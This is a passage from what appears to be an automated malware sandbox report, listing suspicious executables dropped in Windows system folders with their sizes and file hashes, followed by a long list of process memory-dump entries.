SHA512ee0e3f619f0294e3e67e324cab582dd790ba2c15ae08365c0481fd07e32949428c9f4f4872572f52df02be3cd558c78be8af5696da4731b528019ad6706770f8
-
C:\Windows\Temp\Networks\taskmgr.exeFilesize
481KB
MD5458a2b86b2c610cc66b3aa081c45584b
SHA11771b2d47e29076ef9caaadc520cd3f73cbcbae2
SHA256ec616b6475f04802a385a5d1841843e48d7dc115eaf7bc6221ebe4f2d6803e7e
SHA5126d8758f4adc7c75e9daa84dea269c2d768e34644326fac8b836a4ee9eaf5ff7dbba23d0d4c1b424e2f1058e9c3ce0012d4acb7ed455d95c21581400fbf9355ac
-
C:\Windows\Temp\wimnat.exeFilesize
72KB
MD52334bb8baf5e062683d8ec67b7ac531e
SHA15419ddccabaa0a0b98fd6783c8341012c40db522
SHA2566c310b9829fe5fac50b0ea752242b456b3b86462dee46624337715831deb8b2e
SHA512ee0e3f619f0294e3e67e324cab582dd790ba2c15ae08365c0481fd07e32949428c9f4f4872572f52df02be3cd558c78be8af5696da4731b528019ad6706770f8
-
C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exeFilesize
4.7MB
MD5e2f922fc8900ca88a305101ed7820c53
SHA16465e375ef71d1df58f532c6cd3db60f9534e69e
SHA2562efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770
SHA512f903de003ea31cbe7deb2f87fd94a46e172534665f7bfa370d2c541971b349ee31c7763c6e34788705941fa4006bd73cb1c974e3e23e54106068ca6413247475
-
memory/268-150-0x0000000000000000-mapping.dmp
-
memory/408-137-0x0000000000000000-mapping.dmp
-
memory/492-142-0x0000000000000000-mapping.dmp
-
memory/1000-157-0x0000000000000000-mapping.dmp
-
memory/1032-167-0x0000000000000000-mapping.dmp
-
memory/1032-176-0x0000000000A50000-0x0000000000A6F000-memory.dmpFilesize
124KB
-
memory/1032-187-0x0000000000A50000-0x0000000000A6F000-memory.dmpFilesize
124KB
-
memory/1268-185-0x0000000000000000-mapping.dmp
-
memory/1328-158-0x0000000000000000-mapping.dmp
-
memory/1344-133-0x0000000000000000-mapping.dmp
-
memory/1624-163-0x0000000000000000-mapping.dmp
-
memory/1692-141-0x0000000000000000-mapping.dmp
-
memory/1828-161-0x0000000000000000-mapping.dmp
-
memory/1992-138-0x0000000000000000-mapping.dmp
-
memory/1992-147-0x00007FF6BDF80000-0x00007FF6BE06E000-memory.dmpFilesize
952KB
-
memory/1992-170-0x00007FF6BDF80000-0x00007FF6BE06E000-memory.dmpFilesize
952KB
-
memory/2156-136-0x0000000000000000-mapping.dmp
-
memory/2200-139-0x0000000000000000-mapping.dmp
-
memory/2400-156-0x0000000000000000-mapping.dmp
-
memory/2508-149-0x0000000000000000-mapping.dmp
-
memory/3076-160-0x0000000000000000-mapping.dmp
-
memory/3224-134-0x0000000000000000-mapping.dmp
-
memory/3728-186-0x0000000000000000-mapping.dmp
-
memory/3760-171-0x0000000010000000-0x0000000010008000-memory.dmpFilesize
32KB
-
memory/3760-151-0x0000000000000000-mapping.dmp
-
memory/3840-155-0x0000000000000000-mapping.dmp
-
memory/3848-135-0x0000000000000000-mapping.dmp
-
memory/3928-159-0x0000000000000000-mapping.dmp
-
memory/4236-162-0x0000000000000000-mapping.dmp
-
memory/4236-189-0x0000000000000000-mapping.dmp
-
memory/4392-164-0x0000000000000000-mapping.dmp
-
memory/4548-191-0x0000000000000000-mapping.dmp
-
memory/4624-132-0x0000000000000000-mapping.dmp
-
memory/4828-190-0x0000000000000000-mapping.dmp
-
memory/4872-148-0x0000000000000000-mapping.dmp
-
memory/4988-154-0x0000000000000000-mapping.dmp
-
memory/5104-183-0x0000000000000000-mapping.dmp
-
memory/5788-180-0x0000000000000000-mapping.dmp
-
memory/5840-184-0x0000000000000000-mapping.dmp
-
memory/5892-188-0x0000000000000000-mapping.dmp
-
memory/6040-192-0x0000000000000000-mapping.dmp